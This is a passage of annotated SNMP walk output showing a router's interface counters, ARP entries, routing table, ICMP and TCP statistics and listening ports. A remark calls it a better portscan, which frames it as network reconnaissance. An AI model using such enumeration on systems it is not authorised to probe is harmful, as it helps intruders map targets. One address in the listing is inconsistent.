interfaces.ifTable.ifEntry.ifOutNUcastPkts.9 = Counter: 0
interfaces.ifTable.ifEntry.ifOutDiscards.1 = Counter: 0
interfaces.ifTable.ifEntry.ifOutDiscards.2 = Counter: 0
interfaces.ifTable.ifEntry.ifOutDiscards.3 = Counter: 0
interfaces.ifTable.ifEntry.ifOutDiscards.4 = Counter: 0
interfaces.ifTable.ifEntry.ifOutDiscards.5 = Counter: 0
interfaces.ifTable.ifEntry.ifOutDiscards.6 = Counter: 0
interfaces.ifTable.ifEntry.ifOutDiscards.7 = Counter: 0
interfaces.ifTable.ifEntry.ifOutDiscards.8 = Counter: 0
interfaces.ifTable.ifEntry.ifOutDiscards.9 = Counter: 0
interfaces.ifTable.ifEntry.ifOutErrors.1 = Counter: 0
interfaces.ifTable.ifEntry.ifOutErrors.2 = Counter: 920
interfaces.ifTable.ifEntry.ifOutErrors.3 = Counter: 0
interfaces.ifTable.ifEntry.ifOutErrors.4 = Counter: 0
interfaces.ifTable.ifEntry.ifOutErrors.5 = Counter: 0
interfaces.ifTable.ifEntry.ifOutErrors.6 = Counter: 0
interfaces.ifTable.ifEntry.ifOutErrors.7 = Counter: 0
interfaces.ifTable.ifEntry.ifOutErrors.8 = Counter: 0
interfaces.ifTable.ifEntry.ifOutErrors.9 = Counter: 0
interfaces.ifTable.ifEntry.ifOutQLen.1 = Gauge: 0
interfaces.ifTable.ifEntry.ifOutQLen.2 = Gauge: 0
interfaces.ifTable.ifEntry.ifOutQLen.3 = Gauge: 0
interfaces.ifTable.ifEntry.ifOutQLen.4 = Gauge: 0
interfaces.ifTable.ifEntry.ifOutQLen.5 = Gauge: 0
interfaces.ifTable.ifEntry.ifOutQLen.6 = Gauge: 0
interfaces.ifTable.ifEntry.ifOutQLen.7 = Gauge: 0
interfaces.ifTable.ifEntry.ifOutQLen.8 = Gauge: 0
interfaces.ifTable.ifEntry.ifOutQLen.9 = Gauge: 0
interfaces.ifTable.ifEntry.ifSpecific.1 = OBJECT IDENTIFIER: .ccitt.0
interfaces.ifTable.ifEntry.ifSpecific.2 = OBJECT IDENTIFIER: .ccitt.0
interfaces.ifTable.ifEntry.ifSpecific.3 = OBJECT IDENTIFIER: .ccitt.0
interfaces.ifTable.ifEntry.ifSpecific.4 = OBJECT IDENTIFIER: .ccitt.0
interfaces.ifTable.ifEntry.ifSpecific.5 = OBJECT IDENTIFIER: .ccitt.0
interfaces.ifTable.ifEntry.ifSpecific.6 = OBJECT IDENTIFIER: .ccitt.0
interfaces.ifTable.ifEntry.ifSpecific.7 = OBJECT IDENTIFIER: .ccitt.0
interfaces.ifTable.ifEntry.ifSpecific.8 = OBJECT IDENTIFIER: .ccitt.0
interfaces.ifTable.ifEntry.ifSpecific.9 = OBJECT IDENTIFIER: .ccitt.0

 <[ status of the interfaces ....... ]>

at.atTable.atEntry.atIfIndex.2.1.192.168.0.4 = INTEGER: 2
at.atTable.atEntry.atIfIndex.2.1.12.32.42.194 = INTEGER: 2
at.atTable.atEntry.atIfIndex.2.1.12.32.42.195 = INTEGER: 2
at.atTable.atEntry.atIfIndex.2.1.12.32.42.199 = INTEGER: 2
at.atTable.atEntry.atPhysAddress.2.1.192.168.0.4 = OCTET STRING:  Hex: 00 20 AF 3C 07 F7
at.atTable.atEntry.atPhysAddress.2.1.12.32.42.194 = OCTET STRING:  Hex: 00 20 AF 90 C9 9E
at.atTable.atEntry.atPhysAddress.2.1.12.32.42.195 = OCTET STRING:  Hex: 00 00 21 00 0C 90
at.atTable.atEntry.atPhysAddress.2.1.12.32.42.199 = OCTET STRING:  Hex: 00 00 21 00 0C 90
at.atTable.atEntry.atNetAddress.2.1.192.168.0.4 = IpAddress: 192.168.0.4
at.atTable.atEntry.atNetAddress.2.1.12.32.42.194 = IpAddress: 12.32.42.194
at.atTable.atEntry.atNetAddress.2.1.12.32.42.195 = IpAddress: 12.32.42.195
at.atTable.atEntry.atNetAddress.2.1.12.32.42.199 = IpAddress: 12.32.42.199

 <[ at - address translation .......... ]>

ip.ipForwarding.0 = INTEGER: forwarding(1)
ip.ipDefaultTTL.0 = INTEGER: 64
ip.ipInReceives.0 = Counter: 4450847
ip.ipInHdrErrors.0 = Counter: 0
ip.ipInAddrErrors.0 = Counter: 0
ip.ipForwDatagrams.0 = Counter: 617086
ip.ipInUnknownProtos.0 = Counter: 0
ip.ipInDiscards.0 = Counter: 0
ip.ipInDelivers.0 = Counter: 2166415
ip.ipOutRequests.0 = Counter: 3754208
ip.ipOutDiscards.0 = Counter: 2063
ip.ipOutNoRoutes.0 = Counter: 0
ip.ipReasmTimeout.0 = INTEGER: 0
ip.ipReasmReqds.0 = Counter: 65
ip.ipReasmOKs.0 = Counter: 32
ip.ipReasmFails.0 = Counter: 0
ip.ipFragOKs.0 = Counter: 100
ip.ipFragFails.0 = Counter: 383
ip.ipFragCreates.0 = Counter: 682

 <[ IP options ... ]>

ip.ipAddrTable.ipAddrEntry.ipAdEntAddr.127.0.0.1 = IpAddress: 127.0.0.1
ip.ipAddrTable.ipAddrEntry.ipAdEntAddr.12.32.42.193 = IpAddress: 12.32.42.193
ip.ipAddrTable.ipAddrEntry.ipAdEntAddr.14.11.225.193 = IpAddress: 14.11.225.193
ip.ipAddrTable.ipAddrEntry.ipAdEntIfIndex.127.0.0.1 = INTEGER: 1
ip.ipAddrTable.ipAddrEntry.ipAdEntIfIndex.12.32.42.193 = INTEGER: 2
ip.ipAddrTable.ipAddrEntry.ipAdEntIfIndex.14.11.15.193 = INTEGER: 3
ip.ipAddrTable.ipAddrEntry.ipAdEntNetMask.127.0.0.1 = IpAddress: 255.0.0.0
ip.ipAddrTable.ipAddrEntry.ipAdEntNetMask.12.32.42.193 = IpAddress: 255.255.255.255
ip.ipAddrTable.ipAddrEntry.ipAdEntNetMask.14.11.15.193 = IpAddress: 255.255.255.224
ip.ipAddrTable.ipAddrEntry.ipAdEntBcastAddr.127.0.0.1 = INTEGER: 0
ip.ipAddrTable.ipAddrEntry.ipAdEntBcastAddr.12.32.42.193 = INTEGER: 1
ip.ipAddrTable.ipAddrEntry.ipAdEntBcastAddr.14.11.15.193 = INTEGER: 1
ip.ipAddrTable.ipAddrEntry.ipAdEntReasmMaxSize.127.0.0.1 = INTEGER: 20480
ip.ipAddrTable.ipAddrEntry.ipAdEntReasmMaxSize.12.32.42.193 = INTEGER: 20480
ip.ipAddrTable.ipAddrEntry.ipAdEntReasmMaxSize.14.11.15.193 = INTEGER: 20480
ip.ipRouteTable.ipRouteEntry.ipRouteDest.0.0.0.0 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteDest.192.168.0.0 = IpAddress: 192.168.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteDest.192.168.0.4 = IpAddress: 192.168.0.4
ip.ipRouteTable.ipRouteEntry.ipRouteDest.12.32.42.27 = IpAddress: 12.32.42.27
ip.ipRouteTable.ipRouteEntry.ipRouteDest.12.32.42.194 = IpAddress: 12.32.42.194
ip.ipRouteTable.ipRouteEntry.ipRouteDest.12.32.42.195 = IpAddress: 12.32.42.195
ip.ipRouteTable.ipRouteEntry.ipRouteDest.12.32.42.196 = IpAddress: 12.32.42.196
ip.ipRouteTable.ipRouteEntry.ipRouteDest.12.32.42.199 = IpAddress: 12.32.42.199
ip.ipRouteTable.ipRouteEntry.ipRouteDest.12.32.42.200 = IpAddress: 12.32.42.200
ip.ipRouteTable.ipRouteEntry.ipRouteDest.12.32.42.202 = IpAddress: 12.32.42.202
ip.ipRouteTable.ipRouteEntry.ipRouteDest.12.32.42.210 = IpAddress: 12.32.42.210
ip.ipRouteTable.ipRouteEntry.ipRouteDest.14.11.15.192 = IpAddress: 14.11.15.192
ip.ipRouteTable.ipRouteEntry.ipRouteDest.14.11.15.200 = IpAddress: 14.11.15.200
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.0.0.0.0 = INTEGER: 4
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.192.168.0.0 = INTEGER: 2
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.192.168.0.4 = INTEGER: 2
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.12.32.42.27 = INTEGER: 4
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.12.32.42.194 = INTEGER: 2
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.12.32.42.195 = INTEGER: 2
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.12.32.42.196 = INTEGER: 2
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.12.32.42.199 = INTEGER: 2
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.12.32.42.200 = INTEGER: 3
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.12.32.42.202 = INTEGER: 6
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.12.32.42.210 = INTEGER: 2
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.14.11.15.192 = INTEGER: 3
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.14.11.15.200 = INTEGER: 3
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.0.0.0.0 = INTEGER: 1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.192.168.0.0 = INTEGER: 1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.192.168.0.4 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.12.32.42.27 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.12.32.42.194 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.12.32.42.195 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.12.32.42.196 = INTEGER: 1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.12.32.42.199 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.12.32.42.200 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.12.32.42.202 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.12.32.42.210 = INTEGER: 1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.14.11.15.192 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.14.11.15.200 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.0.0.0.0 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.192.168.0.0 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.192.168.0.4 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.12.32.42.27 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.12.32.42.194 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.12.32.42.195 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.12.32.42.196 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.12.32.42.199 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.12.32.42.200 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.12.32.42.202 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.12.32.42.210 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.14.11.15.192 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.14.11.15.200 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.0.0.0.0 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.192.168.0.0 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.192.168.0.4 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.12.32.42.27 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.12.32.42.194 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.12.32.42.195 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.12.32.42.196 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.12.32.42.199 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.12.32.42.200 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.12.32.42.202 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.12.32.42.210 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.14.11.15.192 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.14.11.15.200 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.0.0.0.0 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.192.168.0.0 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.192.168.0.4 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.12.32.42.27 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.12.32.42.194 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.12.32.42.195 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.12.32.42.196 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.12.32.42.199 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.12.32.42.200 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.12.32.42.202 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.12.32.42.210 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.14.11.15.192 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.14.11.15.200 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.0.0.0.0 = IpAddress: 12.32.42.27
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.192.168.0.0 = IpAddress: 192.168.0.4
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.192.168.0.4 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.12.32.42.27 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.12.32.42.194 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.12.32.42.195 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.12.32.42.196 = IpAddress: 12.32.42.195
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.12.32.42.199 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.12.32.42.200 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.12.32.42.202 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.12.32.42.210 = IpAddress: 12.32.42.195
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.14.11.15.192 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.14.11.15.200 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteType.0.0.0.0 = INTEGER: indirect(4)
ip.ipRouteTable.ipRouteEntry.ipRouteType.192.168.0.0 = INTEGER: indirect(4)
ip.ipRouteTable.ipRouteEntry.ipRouteType.192.168.0.4 = INTEGER: direct(3)
ip.ipRouteTable.ipRouteEntry.ipRouteType.12.32.42.27 = INTEGER: direct(3)
ip.ipRouteTable.ipRouteEntry.ipRouteType.12.32.42.194 = INTEGER: direct(3)
ip.ipRouteTable.ipRouteEntry.ipRouteType.12.32.42.195 = INTEGER: direct(3)
ip.ipRouteTable.ipRouteEntry.ipRouteType.12.32.42.196 = INTEGER: indirect(4)
ip.ipRouteTable.ipRouteEntry.ipRouteType.12.32.42.199 = INTEGER: direct(3)
ip.ipRouteTable.ipRouteEntry.ipRouteType.12.32.42.200 = INTEGER: direct(3)
ip.ipRouteTable.ipRouteEntry.ipRouteType.12.32.42.202 = INTEGER: direct(3)
ip.ipRouteTable.ipRouteEntry.ipRouteType.12.32.42.210 = INTEGER: indirect(4)
ip.ipRouteTable.ipRouteEntry.ipRouteType.14.11.15.192 = INTEGER: direct(3)
ip.ipRouteTable.ipRouteEntry.ipRouteType.14.11.15.200 = INTEGER: direct(3)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.0.0.0.0 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.192.168.0.0 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.192.168.0.4 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.12.32.42.27 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.12.32.42.194 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.12.32.42.195 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.12.32.42.196 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.12.32.42.199 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.12.32.42.200 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.12.32.42.202 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.12.32.42.210 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.14.11.15.192 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteProto.14.11.15.200 = INTEGER: local(2)
ip.ipRouteTable.ipRouteEntry.ipRouteAge.0.0.0.0 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.192.168.0.0 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.192.168.0.4 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.12.32.42.27 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.12.32.42.194 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.12.32.42.195 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.12.32.42.196 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.12.32.42.199 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.12.32.42.200 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.12.32.42.202 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.12.32.42.210 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.14.11.15.192 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteAge.14.11.15.200 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMask.0.0.0.0 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteMask.192.168.0.0 = IpAddress: 255.255.128.0
ip.ipRouteTable.ipRouteEntry.ipRouteMask.192.168.0.4 = IpAddress: 255.255.255.255
ip.ipRouteTable.ipRouteEntry.ipRouteMask.12.32.42.27 = IpAddress: 255.255.255.255
ip.ipRouteTable.ipRouteEntry.ipRouteMask.12.32.42.194 = IpAddress: 255.255.255.255
ip.ipRouteTable.ipRouteEntry.ipRouteMask.12.32.42.195 = IpAddress: 255.255.255.255
ip.ipRouteTable.ipRouteEntry.ipRouteMask.12.32.42.196 = IpAddress: 255.255.255.255
ip.ipRouteTable.ipRouteEntry.ipRouteMask.12.32.42.199 = IpAddress: 255.255.255.255
ip.ipRouteTable.ipRouteEntry.ipRouteMask.12.32.42.200 = IpAddress: 255.255.255.248
ip.ipRouteTable.ipRouteEntry.ipRouteMask.12.32.42.202 = IpAddress: 255.255.255.255
ip.ipRouteTable.ipRouteEntry.ipRouteMask.12.32.42.210 = IpAddress: 255.255.255.255
ip.ipRouteTable.ipRouteEntry.ipRouteMask.14.11.15.192 = IpAddress: 255.255.255.224
ip.ipRouteTable.ipRouteEntry.ipRouteMask.14.11.15.200 = IpAddress: 255.255.255.248
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.0.0.0.0 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.192.168.0.0 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.192.168.0.4 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.12.32.42.27 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.12.32.42.194 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.12.32.42.195 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.12.32.42.196 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.12.32.42.199 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.12.32.42.200 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.12.32.42.202 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.12.32.42.210 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.14.11.15.192 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric5.14.11.15.200 = INTEGER: -1

 <[ routing table ........ ]>

ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaIfIndex.2.192.168.0.4 = INTEGER: 2
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaIfIndex.2.12.32.42.194 = INTEGER: 2
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaIfIndex.2.12.32.42.195 = INTEGER: 2
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaIfIndex.2.12.32.42.199 = INTEGER: 2
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress.2.192.168.0.4 = OCTET STRING:  Hex: 00 20 AF 3C 07 F7
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress.2.12.32.42.194 = OCTET STRING:  Hex: 00 20 AF 90 C9 9E
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress.2.12.32.42.195 = OCTET STRING:  Hex: 00 00 21 00 0C 90
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress.2.12.32.42.199 = OCTET STRING:  Hex: 00 00 21 00 0C 90
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaNetAddress.2.192.168.0.4 = IpAddress: 192.168.0.4
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaNetAddress.2.12.32.42.194 = IpAddress: 12.32.42.194
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaNetAddress.2.12.32.42.195 = IpAddress: 12.32.42.195
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaNetAddress.2.12.32.42.199 = IpAddress: 12.32.42.199
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaType.2.192.168.0.4 = INTEGER: dynamic(3)
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaType.2.12.32.42.194 = INTEGER: dynamic(3)
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaType.2.12.32.42.195 = INTEGER: dynamic(3)
ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaType.2.12.32.42.199 = INTEGER: dynamic(3)

 <[ ARP and so on ]>

icmp.icmpInMsgs.0 = Counter: 50064
icmp.icmpInErrors.0 = Counter: 112
icmp.icmpInDestUnreachs.0 = Counter: 21642
icmp.icmpInTimeExcds.0 = Counter: 100
icmp.icmpInParmProbs.0 = Counter: 0
icmp.icmpInSrcQuenchs.0 = Counter: 29
icmp.icmpInRedirects.0 = Counter: 36
icmp.icmpInEchos.0 = Counter: 19863
icmp.icmpInEchoReps.0 = Counter: 8394
icmp.icmpInTimestamps.0 = Counter: 0
icmp.icmpInTimestampReps.0 = Counter: 0
icmp.icmpInAddrMasks.0 = Counter: 0
icmp.icmpInAddrMaskReps.0 = Counter: 0
icmp.icmpOutMsgs.0 = Counter: 47095
icmp.icmpOutErrors.0 = Counter: 0
icmp.icmpOutDestUnreachs.0 = Counter: 27202
icmp.icmpOutTimeExcds.0 = Counter: 30
icmp.icmpOutParmProbs.0 = Counter: 0
icmp.icmpOutSrcQuenchs.0 = Counter: 0
icmp.icmpOutRedirects.0 = Counter: 0
icmp.icmpOutEchos.0 = Counter: 0
icmp.icmpOutEchoReps.0 = Counter: 19863
icmp.icmpOutTimestamps.0 = Counter: 0
icmp.icmpOutTimestampReps.0 = Counter: 0
icmp.icmpOutAddrMasks.0 = Counter: 0
icmp.icmpOutAddrMaskReps.0 = Counter: 0

 <[ ICMP statistics ]>

tcp.tcpRtoAlgorithm.0 = INTEGER: other(1)
tcp.tcpRtoMin.0 = INTEGER: 0
tcp.tcpRtoMax.0 = INTEGER: 0
tcp.tcpMaxConn.0 = INTEGER: 0
tcp.tcpActiveOpens.0 = Counter: 27020
tcp.tcpPassiveOpens.0 = Counter: 0
tcp.tcpAttemptFails.0 = Counter: 10
tcp.tcpEstabResets.0 = Counter: 0
tcp.tcpCurrEstab.0 = Gauge: 20
tcp.tcpInSegs.0 = Counter: 1627561
tcp.tcpOutSegs.0 = Counter: 1508541
tcp.tcpRetransSegs.0 = Counter: 46807

 <[ TCP statistics ]>

tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.7.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.9.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.13.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.19.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.21.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.22.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.23.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.25.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.37.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.79.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.80.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.110.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.111.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.113.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.515.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.3046.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.3128.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.3333.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.0.0.0.0.4444.0.0.0.0.0 = INTEGER: listen(2)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.53.0.0.0.0.0 = INTEGER: listen(2)

 <[ you will not get a better portscan than this ]>

tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3644.127.0.0.1.3645 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3645.127.0.0.1.3644 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3646.127.0.0.1.3647 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3647.127.0.0.1.3646 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3648.127.0.0.1.3649 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3649.127.0.0.1.3648 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3650.127.0.0.1.3651 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3651.127.0.0.1.3650 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3652.127.0.0.1.3653 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3653.127.0.0.1.3652 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3654.127.0.0.1.3655 = INTEGER: established(5)
tcp.tcpConnTable.tcpConnEntry.tcpConnState.127.0.0.1.3655.127.0.0.1.3654 = INTEGER: established(5)
